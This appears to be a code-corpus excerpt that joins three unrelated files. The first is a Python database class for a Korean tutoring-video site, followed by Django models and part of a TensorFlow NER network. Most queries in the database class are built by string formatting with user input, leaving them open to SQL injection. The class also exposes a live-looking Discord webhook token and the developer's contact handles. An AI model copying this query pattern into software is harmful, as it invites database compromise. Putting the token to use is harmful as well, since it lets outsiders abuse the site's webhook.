                    "url": "http://onpool.kr",
                    "fields": [
                        {"name": "/ {} /".format(user), "value": "URL: {}\nIP: {}\nTIME:{}".format(url, ip,
                                                                                                  datetime.now().strftime(
                                                                                                      "%Y-%m-%d_%H:%M:%S")),
                         "inline": False},
                    ],
                    "footer": {
                        'text': "ⓒ 이은학 (이은학#9299) \\ Github @R3turn0927 \\ KakaoTalk @bc1916"
                    }
                }
            ]
        }
        return requests.post(
            "https://discordapp.com/api/webhooks/400916071290372106/_BGMidyEj35vyLBzBQ2k-ILjBrVCVJDtpHBA940EznQDjO-eIqlTxhNEpNVkBGgoSILH",
            data=json.dumps(data), headers={"Content-type": "multipart/form-data"}).text

    # Accept only strings consisting entirely of [a-zA-Z0-9]; used as the
    # anti-injection gate for user ids. NOTE: parameter shadows the `string`
    # module; the compiled-regex default is evaluated once (safe: read-only).
    def hardfilter(self, string, r=re.compile("[a-zA-Z0-9]{1,}")):
        print(string)
        res = r.match(string)
        if res is None: return False
        if string == res.group(): return True
        return False

    # Open a new autocommit connection with the stored credentials.
    def getConn(self):
        self.conn = psycopg2.connect(
            host=self.host,
            port=self.port,
            user=self.user,
            password=self.pw,
            database=self.db
        )
        self.conn.autocommit = True
        return self.conn

    # Append a tab-separated (timestamp, ip, query) line to today's log file.
    # NOTE: relies on CPython refcounting to close the file handle.
    def writeLog(self, _ip, query):
        open(self.logfile % datetime.now().strftime("%Y-%m-%d"), "a", encoding="UTF-8") \
            .write("%s\t%s\t%s\n" % (datetime.now().strftime("%Y-%m-%d_%H:%M:%S"), _ip, query))

    # Lazily create and cache a connection + cursor for the calling thread.
    def getCursor(self):
        thread_id = threading.get_ident().__int__()
        if not thread_id in self.connDict.keys():
            self.connDict[thread_id] = self.getConn()
        if thread_id not in self.curDict.keys():
            self.curDict[thread_id] = self.connDict[thread_id].cursor()
        return self.curDict[thread_id]

    # Truthy result means the id is taken (or invalid -- invalid ids return
    # True so callers reject them).
    def checkIDExist(self, id, _ip):
        if not self.hardfilter(id): return True
        cur = self.getCursor()
        query = 'SELECT "id" FROM users WHERE id=\'%s\'' % id
        self.writeLog(_ip, query)
        cur.execute(query)
        _data = cur.fetchall()
        return _data

    # Same contract as checkIDExist, for e-mail addresses.
    def checkEmailExist(self, email, _ip):
        err, _ = validater.email(email)
        if err: return True
        cur = self.getCursor()
        query = 'SELECT "email" FROM users WHERE email=\'%s\'' % email
        self.writeLog(_ip, query)
        cur.execute(query)
        _data = cur.fetchall()
        return _data

    # Insert a new user row. Returns False on success, an error string (or
    # "Invalid Query") on failure.
    def addUser(self, _id, _pw, _name, _bir, _gra, _email, _ip, _code, _org):
        if not self.hardfilter(_id): return "Invalid Query"
        if validater.email(_email)[0]: return "Invalid Query"
        cur = self.getCursor()
        try:
            cur.execute('INSERT INTO users (id,pw,name,grade,birthday,email,email_verified,registered_ip,recent_ip,organization) VALUES(\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\')' % (
                _id, _pw, _name, _gra, _bir, _email, _code, _ip, _ip, _org))
            self.conn.commit()
            return False
        except Exception as ex:
            return str(ex)

    # Redeem an e-mail verification code: [False, True] if a matching row was
    # marked VERIFIED, [False, False] if no match, [True, msg] on error.
    def verifyCode(self, code, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT \'T\' FROM users WHERE email_verified=\'{}\';'.format(code)
            self.writeLog(ip, query)
            cur.execute(query)
            ret = len(cur.fetchall())
            if ret:
                query = 'UPDATE users SET email_verified = \'VERIFIED\' WHERE email_verified=\'{}\';'.format(code)
                self.writeLog(ip, query)
                cur.execute(query)
                return [False, True]
            else:
                return [False, False]
        except Exception as ex:
            return [True, str(ex)]

    # Record the user's most recent IP. False on success, error string on failure.
    def submitRecentIP(self, _id, _ip):
        cur = self.getCursor()
        try:
            query = 'UPDATE users SET recent_ip = \'%s\' WHERE id = \'%s\';' % (_ip, _id)
            self.writeLog(_ip, query)
            cur.execute(query)
            self.conn.commit()
            return False
        except Exception as ex:
            return str(ex)

    # TODO: Regex Check [a-zA-Z0-9]{1,}
    # Credential check: returns [False, rows] where rows is empty on a bad
    # id/password pair. NOTE: passwords are compared in SQL -- presumably
    # already hashed by the caller; verify.
    def getAccount(self, _id, _pw, _ip):
        if not self.hardfilter(_id): return [True, "Invalid Query"]
        cur = self.getCursor()
        try:
            query = 'SELECT name, email_verified FROM users WHERE id=\'%s\' and pw=\'%s\'' % (_id, _pw)
            self.writeLog(_ip, query)
            cur.execute(query)
            result = cur.fetchall()
            print(result)
            return [False, result]
        except Exception as ex:
            return [True, str(ex)]

    # (email, email_verified) for a user id.
    def getUserCode(self, id, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT email, email_verified FROM users WHERE id=\'{}\';'.format(id)
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0]]
        except Exception as ex:
            return [True, str(ex)]

    # Single-value lookups below log under the pseudo-IP "LOCAL".
    def getUserOrg(self, id):
        cur = self.getCursor()
        try:
            query = 'SELECT organization FROM users WHERE id=\'{}\';'.format(id)
            self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0][0]]
        except Exception as ex:
            return [True, str(ex)]

    def getUserGrade(self, id):
        cur = self.getCursor()
        try:
            query = 'SELECT grade FROM users WHERE id=\'{}\';'.format(id)
            self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0][0]]
        except Exception as ex:
            return [True, str(ex)]

    # All serviced book series names, sorted. NOTE: `selection` is unused.
    def getBookSeries(self, ip, selection="*"):
        cur = self.getCursor()
        try:
            query = 'SELECT name FROM bookseries WHERE serviced=TRUE ;'
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, sorted(result)]
        except Exception as ex:
            return [True, str(ex)]

    # Curriculum id for a subject name.
    def getSubjId(self, subj, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT id FROM curriculum WHERE name=\'{}\';'.format(subj)
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()[0]
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Subject name for a curriculum id (inverse of getSubjId).
    def getSub(self, subjid):
        cur = self.getCursor()
        try:
            query = 'SELECT name FROM curriculum WHERE id=\'{}\';'.format(subjid)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0][0]]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # (year, chapter_indication) rows for a book within a subject.
    def getInfo(self, subj, book, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT year, chapter_indication FROM book WHERE bookname=\'{1}\' AND curr_id=\'{0}\';'.format(subj, book)
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # book_id for (subject, book name, year).
    def getBook(self, subj, book, year):
        cur = self.getCursor()
        try:
            query = 'SELECT book_id FROM book WHERE bookname=\'{1}\' AND curr_id=\'{0}\' AND year=\'{2}\';'.format(subj,
                                                                                                                  book,
                                                                                                                  year)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0][0]]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Display message attached to a book series.
    def getBookMessage(self, book):
        cur = self.getCursor()
        try:
            query = 'SELECT message FROM bookseries WHERE name=\'{}\';'.format(book)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0][0]]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # (curr_id, bookname, year) for a book id.
    def getBookInfo(self, bid):
        cur = self.getCursor()
        try:
            query = 'SELECT curr_id, bookname, year FROM book WHERE book_id=\'{}\';'.format(bid)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0]]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # --- beta ---
    # One-shot beta invite code: True consumes the code, False otherwise.
    # NOTE: errors are silently reported as "invalid code" (returns False).
    def checkBetaCode(self, code, ip):
        cur = self.getCursor()
        try:
            query = "SELECT code FROM codes WHERE allowed=1;"
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            result = [x[0] for x in result]
            if code not in result: return False
            query = "UPDATE codes SET allowed = 0 WHERE code='{}';".format(code)
            self.writeLog(ip, query)
            cur.execute(query)
            return True
        except Exception as ex:
            return False

    # problem_id for (book, page, number); [False, False] when absent.
    # NOTE: `raise ex` makes the two lines after it unreachable.
    def getProblemId(self, book_id, page, number):
        cur = self.getCursor()
        try:
            query = 'SELECT problem_id FROM problem WHERE book_id=\'{}\' AND page=\'{}\' AND number=\'{}\';'.format(
                book_id, page, number)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            if len(result):
                return [False, result[0][0]]
            else:
                return [False, False]
        except Exception as ex:
            raise ex
            print(ex)
            return [True, str(ex)]

    # (book_id, page, number) for a problem id; see getProblemId re: raise.
    def getProblemInfo(self, pid):
        cur = self.getCursor()
        try:
            query = 'SELECT book_id, page, number FROM problem WHERE problem_id=\'{}\';'.format(pid)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            if len(result):
                return [False, result[0]]
            else:
                return [False, False]
        except Exception as ex:
            raise ex
            print(ex)
            return [True, str(ex)]

    # --- Functional Features ---
    # Solution-video URL for a problem; [False, False] when none exists.
    def getVideo(self, pid):
        cur = self.getCursor()
        try:
            query = 'SELECT url FROM solution_video WHERE problem_id=\'{}\';'.format(pid)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            result = cur.fetchall()
            if len(result):
                return [False, result[0][0]]
            else:
                return [False, False]
        except Exception as ex:
            raise ex
            print(ex)
            return [True, str(ex)]

    # Increment a video's hit counter.
    def videoHit(self, url):
        cur = self.getCursor()
        try:
            query = 'UPDATE solution_video SET hit=hit+1 WHERE url=\'{}\';'.format(url)
            # self.writeLog("LOCAL", query)
            cur.execute(query)
            self.writeLog("LOCAL", query)
            return [False, None]
        except Exception as ex:
            #raise ex
            return [True, str(ex)]

    # Count of existing questions by this student for this problem.
    def checkDuplicated(self, pid, requester):
        cur = self.getCursor()
        try:
            query = 'SELECT status FROM question WHERE student_id=\'{}\' and problem_id=\'{}\';'.format(requester, pid)
            cur.execute(query)
            result = cur.fetchall()
            return [False, len(result)]
        except Exception as ex:
            raise ex
            print(ex)
            return [True, str(ex)]

    # Register a student's question: creates the problem row if needed,
    # inserts the question, auto-answers if a solution video already exists,
    # charges points unless the question is a duplicate, and notifies the
    # Discord webhook. Returns [False, user-facing Korean message].
    def submitmyQuestion(self, _requester, subj, bookseries, year, page, no, ip):
        cur = self.getCursor()
        try:
            duplicated = False
            err, bookid = self.getBook(subj, bookseries, year)
            if err: raise Exception(bookid)
            err, pid = self.getProblemId(book_id=bookid, page=page, number=no)
            if err: raise Exception(pid)
            if pid:
                print("Already Uploaded Question-Problem")
                err, ret = self.checkDuplicated(pid, _requester)
                if err:
                    pass
                elif ret:
                    duplicated = True
            else:
                print("Adding New Question-Problem")
                query = 'INSERT INTO problem (book_id, page, number) VALUES ({}, \'{}\', {}) RETURNING problem_id;'.format(
                    bookid, page, no)
                self.writeLog(ip, query)
                cur.execute(query)
                pid = cur.fetchall()[0][0]
            query = 'INSERT INTO question (problem_id, student_id) VALUES ({}, \'{}\') RETURNING question_id;'.format(
                pid, _requester)
            self.writeLog(ip, query)
            cur.execute(query)
            qid = cur.fetchall()[0][0]
            err, data = self.getVideo(pid)
            self._send_webhook("질문등록",
                               "Problem: {}\nQuestionID:{}\n교재번호: {}\n페이지(챕터): {}\n문항번호: {}\n신청자: {}\n\n새로운 질문이 접수되었습니다."
                               .format(pid, qid, bookid, page, no, _requester),
                               _requester, "DB.submitmyQuestion", ip
                               )
            if err:
                pass
            else:
                if data is False:
                    pass
                else:
                    # A video already exists: auto-answer the question.
                    query = 'UPDATE question SET status = 1, message = \'자동답변\', p_time = current_date, p_time_ = now() WHERE question_id=\'{}\';'.format(
                        qid)
                    self.writeLog("AUTOMATION", query)
                    cur.execute(query)
                    if not duplicated:
                        # First-time questions cost points.
                        query = 'UPDATE users SET point = point - {} WHERE id=\'{}\';'.format(self.gSet.question_cost,
                                                                                             _requester)
                        self.writeLog(ip, query)
                        cur.execute(query)
                    self._send_webhook("자동답변",
                                       "ProblemID: {}\nQuestionID: {}\n\n에 대한 해설영상이 자동으로 등록되었습니다.".format(pid, qid),
                                       _requester, "DB.submitmyQuestion", ip, colour=10539945)
            if duplicated:
                return [False, "중복질문으로 인해 포인트 차감없이 질문이 등록되었습니다."]
            else:
                return [False, "질문이 등록되었습니다."]
        except Exception as ex:
            raise ex
            return [True, str(ex)]

    # --- MyPage ---
    # Questions by a user since `timestr` (SQL expression), newest first.
    def getMyQuestion(self, User, ip, timestr="to_date('19700101','YYYYMMDD')"):
        cur = self.getCursor()
        try:
            query = 'SELECT problem_id, TO_CHAR(q_time, \'YYYY-MM-DD\'), status, message FROM question WHERE student_id=\'{}\' AND q_time >= {} ORDER BY question_id;'.format(
                User['id'], timestr)
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            result.reverse()
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Book info of the user's most recent question.
    def getMyLastestQuestion(self, User, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT curr_id, bookname, year FROM book WHERE book.book_id=(SELECT book_id FROM problem WHERE problem.problem_id=(SELECT problem_id FROM question WHERE student_id=\'{}\' ORDER BY question_id DESC LIMIT 1));'.format(User['id'])
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0]]
        except Exception as ex:
            return [True, str(ex)]

    # Number of questions the user asked since `timestr` (default: today).
    def getMyQuestionTodayCount(self, User, ip, timestr="current_date"):
        cur = self.getCursor()
        try:
            query = 'SELECT count(problem_id) FROM question WHERE student_id=\'{}\' AND q_time >= {}'.format(User['id'],
                                                                                                            timestr)
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()[0][0]
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Current point balance (returned as a one-element row tuple).
    def get_point(self, user, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT point FROM users WHERE id=\'{}\';'.format(user)
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0]]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Per-day question limit for the user.
    def getMyDayRateLimit(self, User, ip):
        cur = self.getCursor()
        try:
            query = 'SELECT daily_limit FROM users WHERE id=\'{}\';'.format(User['id'])
            self.writeLog(ip, query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result[0][0]]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # --- Admin Panel ---
    # Latest questions, newest first, up to `limit`.
    def getAllQuestions(self, limit=20):
        cur = self.getCursor()
        try:
            print(limit)
            query = 'SELECT question_id, problem_id, student_id,TO_CHAR(q_time, \'YYYY-MM-DD\'), q_time_, status, message FROM question ORDER BY question_id DESC LIMIT {};'.format(
                limit)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # All solution videos. NOTE: the LIMIT clause is commented out in the
    # SQL (`;-- LIMIT=...`), so `limit` has no effect here.
    def getAllVideos(self, limit=20):
        cur = self.getCursor()
        try:
            print(limit)
            query = 'SELECT problem_id, url, tutor, hit FROM solution_video ORDER BY problem_id;-- LIMIT={};'.format(
                limit)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # All problems. Same inert-LIMIT caveat as getAllVideos.
    def getAllProblems(self, limit=20):
        cur = self.getCursor()
        try:
            print(limit)
            query = 'SELECT problem_id, book_id, page, number FROM problem ORDER BY problem_id;-- LIMIT={};'.format(
                limit)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            result = cur.fetchall()
            return [False, result]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Attach an uploaded solution video to a problem and announce it.
    def insertVideo(self, id, vid, pid, nick, ip):
        cur = self.getCursor()
        try:
            query = 'INSERT INTO solution_video VALUES (\'{}\',\'/video/flowplayer/play?vid={}\',\'{}\',0);'.format(pid,
                                                                                                                    vid,
                                                                                                                    id)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            self._send_webhook("영상 등록",
                               "ProblemID: {}\nVideo Hash: {}\nUploader:{}\n\n새로운 영상이 업로드되었습니다.".format(pid, vid, id),
                               "{}".format(nick), "DB.insertVideo", ip, colour=3092790)
            return [False, None]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Mark all questions on a problem as answered ("지연답변") and e-mail the
    # students whose questions were resolved.
    def updateStatus(self, pid):
        cur = self.getCursor()
        try:
            query = 'UPDATE question SET status=1, message=\'지연답변\', p_time = current_date, p_time_ = now() WHERE problem_id={} RETURNING (SELECT email FROM users WHERE id=question.student_id);;'.format(
                pid)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            emails = [x[0] for x in cur.fetchall()]
            for email in emails:
                self.send_email(email, "회원님의 질문에 대한 영상이 준비되었습니다.", """
                <p>회원님의 질문에 대한 해설영상이 방금 업로드되었습니다.</p>
                <br />
                <a target='_blank' href='http://onpool.kr/'>온풀 방문하기</a>""")
            return [False, None]
        except Exception as ex:
            print(ex)
            return [True, str(ex)]

    # Admin helper: create a problem row and return its new id.
    def makeProblem(self, subj, bookseries, year, page, no):
        cur = self.getCursor()
        try:
            err, bookid = self.getBook(subj, bookseries, year)
            if err: raise Exception("Error on Making Problem with bookid err: {}".format(bookid))
            print("Adding New Question-Problem")
            query = 'INSERT INTO problem (book_id, page, number) VALUES ({}, \'{}\', {}) RETURNING problem_id;'.format(
                bookid, page, no)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            pid = cur.fetchall()[0][0]
            return [False, pid]
        except Exception as ex:
            return [True, str(ex)]

    # Admin: overwrite a question's status message and announce the change.
    def updateQuestionMessage(self, qid, msg, nick, ip):
        cur = self.getCursor()
        try:
            query = 'UPDATE question SET message = \'{}\' WHERE question_id = \'{}\';'.format(msg, qid)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            self._send_webhook("질문 문구수정",
                               "QuestionID: {}\nNewMessage:{}\n\n관리자에 의해 질문의 상태메세지가 수정되었습니다.".format(qid, msg),
                               "{}".format(nick), "DB.updateQuestionMessage", ip, colour=3092790)
            return [False, None]
        except Exception as ex:
            return [True, str(ex)]

    # Admin: flag a question as erroneous (status=2).
    def markQuestion(self, qid, nick, ip):
        cur = self.getCursor()
        try:
            query = 'UPDATE question SET status=2 WHERE question_id = \'{}\';'.format(qid)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            self._send_webhook("질문수정", "QuestionID: {}\n\n관리자에 의해 질문이 오류로 표기되었습니다.".format(qid),
                               "{}".format(nick), "DB.markQuestion", ip, colour=3092790)
            return [False, None]
        except Exception as ex:
            return [True, str(ex)]

    # Admin: delete a question and announce it.
    def deleteQuestion(self, qid, nick, ip):
        cur = self.getCursor()
        try:
            query = 'DELETE FROM question WHERE question_id=\'{}\';'.format(qid)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            self._send_webhook("질문삭제", "QuestionID: {}\n\n관리자에 의해 질문이 삭제되었습니다.".format(qid),
                               "{}".format(nick), "DB.deleteQuestion", ip, colour=13369344)
            return [False, None]
        except Exception as ex:
            return [True, str(ex)]

    # Admin: delete a problem row and announce it.
    def deleteProblem(self, pid, nick, ip):
        cur = self.getCursor()
        try:
            query = 'DELETE FROM problem WHERE problem_id=\'{}\';'.format(pid)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            self._send_webhook("문항삭제", "QuestionID: {}\n\n관리자에 의해 질문이 삭제되었습니다.".format(pid),
                               "{}".format(nick), "DB.deleteProblem", ip, colour=13369344)
            return [False, None]
        except Exception as ex:
            return [True, str(ex)]

    # Admin: delete a problem's solution video and announce it.
    def deleteVideo(self, pid, nick, ip):
        cur = self.getCursor()
        try:
            query = 'DELETE FROM solution_video WHERE problem_id=\'{}\';'.format(pid)
            self.writeLog("ADMIN", query)
            cur.execute(query)
            self._send_webhook("영상삭제", "ProblemID: {}\n\n관리자에 의해 영상이 삭제되었습니다.".format(pid),
                               "{}".format(nick), "DB.deleteVideo", ip, colour=13369344)
            return [False, None]
        except Exception as ex:
            return [True, str(ex)]

    # Escape hatch: run arbitrary SQL and return all rows. SECURITY NOTE:
    # must never be reachable with user-controlled input.
    def run(self, query):
        cur = self.getCursor()
        cur.execute(query)
        return cur.fetchall()
|
991,248 | 4ac0b8bd83ed4f9e1d5f7423dede83803cc63136 | from django.db import models
class FanPage(models.Model):
    """A fan page whose posts are collected as Article rows."""
    name = models.CharField(max_length=100)
    def __str__(self):
        return self.name
class Article(models.Model):
    """A single post belonging to a FanPage."""
    # Deleting a FanPage cascades to its articles.
    fanpage = models.ForeignKey(FanPage, on_delete=models.CASCADE)
    text = models.TextField()
    time = models.DateTimeField()  # post timestamp; tz-awareness per Django USE_TZ setting
    url = models.URLField(max_length=2000)
    read = models.BooleanField(default=False)     # viewer has read this article
    starred = models.BooleanField(default=False)  # viewer bookmarked this article
    def __str__(self):
        return f'{self.fanpage}, {self.time}'
|
991,249 | 62f79e1708785d6eacd7eda0edde2e1da8fa202b | # Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from logging import getLogger
from typing import Tuple
import numpy as np
import tensorflow as tf
from deeppavlov.core.common.registry import register
from deeppavlov.core.layers.tf_layers import cudnn_bi_lstm, cudnn_bi_gru, bi_rnn, stacked_cnn, INITIALIZER
from deeppavlov.core.layers.tf_layers import embedding_layer, character_embedding_network, variational_dropout
from deeppavlov.core.models.tf_model import LRScheduledTFModel
log = getLogger(__name__)
@register('ner')
class NerNetwork(LRScheduledTFModel):
    """
    The :class:`~deeppavlov.models.ner.network.NerNetwork` is for Neural Named Entity Recognition and Slot Filling.
    Parameters:
        n_tags: Number of tags in the tag vocabulary.
        token_emb_dim: Dimensionality of token embeddings, needed if embedding matrix is not provided.
        char_emb_dim: Dimensionality of token embeddings.
        capitalization_dim : Dimensionality of capitalization features, if they are provided.
        pos_features_dim: Dimensionality of POS features, if they are provided.
        additional_features: Some other features.
        net_type: Type of the network, either ``'rnn'`` or ``'cnn'``.
        cell_type: Type of the cell in RNN, either ``'lstm'`` or ``'gru'``.
        use_cudnn_rnn: Whether to use CUDNN implementation of RNN.
        two_dense_on_top: Additional dense layer before predictions.
        n_hidden_list: A list of output feature dimensionality for each layer. A value (100, 200) means that there will
            be two layers with 100 and 200 units, respectively.
        cnn_filter_width: The width of the convolutional kernel for Convolutional Neural Networks.
        use_crf: Whether to use Conditional Random Fields on top of the network (recommended).
        token_emb_mat: Token embeddings matrix.
        char_emb_mat: Character embeddings matrix.
        use_batch_norm: Whether to use Batch Normalization or not. Affects only CNN networks.
        dropout_keep_prob: Probability of keeping the hidden state, values from 0 to 1. 0.5 works well in most cases.
        embeddings_dropout: Whether to use dropout on embeddings or not.
        top_dropout: Whether to use dropout on output units of the network or not.
        intra_layer_dropout: Whether to use dropout between layers or not.
        l2_reg: L2 norm regularization for all kernels.
        gpu: Number of gpu to use.
        seed: Random seed.
    """
    # Hyper-parameters that define the graph topology.
    # NOTE(review): "additional_features" and "cell_type" are each listed
    # twice, and other graph-shaping parameters (n_hidden_list, use_crf)
    # are absent -- confirm before relying on this list for checks.
    GRAPH_PARAMS = ["n_tags",  # TODO: add check
                    "char_emb_dim",
                    "capitalization_dim",
                    "additional_features",
                    "use_char_embeddings",
                    "additional_features",
                    "net_type",
                    "cell_type",
                    "char_filter_width",
                    "cell_type"]

    def __init__(self,
                 n_tags: int,  # Features dimensions
                 token_emb_dim: int = None,
                 char_emb_dim: int = None,
                 capitalization_dim: int = None,
                 pos_features_dim: int = None,
                 additional_features: int = None,
                 net_type: str = 'rnn',  # Net architecture
                 cell_type: str = 'lstm',
                 use_cudnn_rnn: bool = False,
                 two_dense_on_top: bool = False,
                 n_hidden_list: Tuple[int] = (128,),
                 cnn_filter_width: int = 7,
                 use_crf: bool = False,
                 token_emb_mat: np.ndarray = None,
                 char_emb_mat: np.ndarray = None,
                 use_batch_norm: bool = False,
                 dropout_keep_prob: float = 0.5,  # Regularization
                 embeddings_dropout: bool = False,
                 top_dropout: bool = False,
                 intra_layer_dropout: bool = False,
                 l2_reg: float = 0.0,
                 gpu: int = None,
                 seed: int = None,
                 **kwargs) -> None:
        """Build the TF graph, create a session, and load weights if present."""
        tf.set_random_seed(seed)
        np.random.seed(seed)
        assert n_tags != 0, 'Number of classes equal 0! It seems that vocabularies is not loaded.' \
                            ' Check that all vocabulary files are downloaded!'
        # Training-schedule defaults, applied only when the config omits them.
        if 'learning_rate_drop_div' not in kwargs:
            kwargs['learning_rate_drop_div'] = 10.0
        if 'learning_rate_drop_patience' not in kwargs:
            kwargs['learning_rate_drop_patience'] = 5.0
        if 'clip_norm' not in kwargs:
            kwargs['clip_norm'] = 5.0
        super().__init__(**kwargs)
        self._add_training_placeholders(dropout_keep_prob)
        self._xs_ph_list = []
        self._y_ph = tf.placeholder(tf.int32, [None, None], name='y_ph')
        self._input_features = []
        # ================ Building input features =================
        # Token embeddings
        self._add_word_embeddings(token_emb_mat, token_emb_dim)
        # Masks for different lengths utterances
        self.mask_ph = self._add_mask()
        # Char embeddings using highway CNN with max pooling
        if char_emb_mat is not None and char_emb_dim is not None:
            self._add_char_embeddings(char_emb_mat)
        # Capitalization features
        if capitalization_dim is not None:
            self._add_capitalization(capitalization_dim)
        # Part of speech features
        if pos_features_dim is not None:
            self._add_pos(pos_features_dim)
        # Anything you want
        if additional_features is not None:
            self._add_additional_features(additional_features)
        # All input feature tensors are concatenated along the feature axis.
        features = tf.concat(self._input_features, axis=2)
        if embeddings_dropout:
            features = variational_dropout(features, self._dropout_ph)
        # ================== Building the network ==================
        if net_type == 'rnn':
            if use_cudnn_rnn:
                if l2_reg > 0:
                    log.warning('cuDNN RNN are not l2 regularizable')
                units = self._build_cudnn_rnn(features, n_hidden_list, cell_type, intra_layer_dropout, self.mask_ph)
            else:
                units = self._build_rnn(features, n_hidden_list, cell_type, intra_layer_dropout, self.mask_ph)
        elif net_type == 'cnn':
            units = self._build_cnn(features, n_hidden_list, cnn_filter_width, use_batch_norm)
        self._logits = self._build_top(units, n_tags, n_hidden_list[-1], top_dropout, two_dense_on_top)
        self.train_op, self.loss = self._build_train_predict(self._logits, self.mask_ph, n_tags,
                                                             use_crf, l2_reg)
        # Dispatch to the CRF (Viterbi) or plain argmax decoder at call time.
        self.predict = self.predict_crf if use_crf else self.predict_no_crf
        # ================= Initialize the session =================
        sess_config = tf.ConfigProto(allow_soft_placement=True)
        sess_config.gpu_options.allow_growth = True
        if gpu is not None:
            sess_config.gpu_options.visible_device_list = str(gpu)
        self.sess = tf.Session(config=sess_config)
        self.sess.run(tf.global_variables_initializer())
        self.load()

    def _add_training_placeholders(self, dropout_keep_prob):
        """Create dropout / is-training placeholders with train-time defaults."""
        self._dropout_ph = tf.placeholder_with_default(dropout_keep_prob, shape=[], name='dropout')
        self.training_ph = tf.placeholder_with_default(False, shape=[], name='is_training')

    def _add_word_embeddings(self, token_emb_mat, token_emb_dim=None):
        """Add the token input: precomputed vectors or an embedding lookup."""
        if token_emb_mat is None:
            # No matrix given: callers feed ready-made float vectors.
            token_ph = tf.placeholder(tf.float32, [None, None, token_emb_dim], name='Token_Ind_ph')
            emb = token_ph
        else:
            # Matrix given: callers feed integer token indices.
            token_ph = tf.placeholder(tf.int32, [None, None], name='Token_Ind_ph')
            emb = embedding_layer(token_ph, token_emb_mat)
        self._xs_ph_list.append(token_ph)
        self._input_features.append(emb)

    def _add_mask(self):
        """Add and return the [batch, time] padding-mask placeholder."""
        mask_ph = tf.placeholder(tf.float32, [None, None], name='Mask_ph')
        self._xs_ph_list.append(mask_ph)
        return mask_ph

    def _add_char_embeddings(self, char_emb_mat):
        """Add character-level features from [batch, time, chars] indices."""
        character_indices_ph = tf.placeholder(tf.int32, [None, None, None], name='Char_ph')
        char_embs = character_embedding_network(character_indices_ph, emb_mat=char_emb_mat)
        self._xs_ph_list.append(character_indices_ph)
        self._input_features.append(char_embs)

    def _add_capitalization(self, capitalization_dim):
        """Add per-token capitalization features, fed directly as floats."""
        capitalization_ph = tf.placeholder(tf.float32, [None, None, capitalization_dim], name='Capitalization_ph')
        self._xs_ph_list.append(capitalization_ph)
        self._input_features.append(capitalization_ph)

    def _add_pos(self, pos_features_dim):
        """Add per-token part-of-speech features, fed directly as floats."""
        pos_ph = tf.placeholder(tf.float32, [None, None, pos_features_dim], name='POS_ph')
        self._xs_ph_list.append(pos_ph)
        self._input_features.append(pos_ph)

    def _add_additional_features(self, features_list):
        """Add arbitrary extra (name, dim) float features to the input stack."""
        for feature, dim in features_list:
            feat_ph = tf.placeholder(tf.float32, [None, None, dim], name=feature + '_ph')
            self._xs_ph_list.append(feat_ph)
            self._input_features.append(feat_ph)

    def _build_cudnn_rnn(self, units, n_hidden_list, cell_type, intra_layer_dropout, mask):
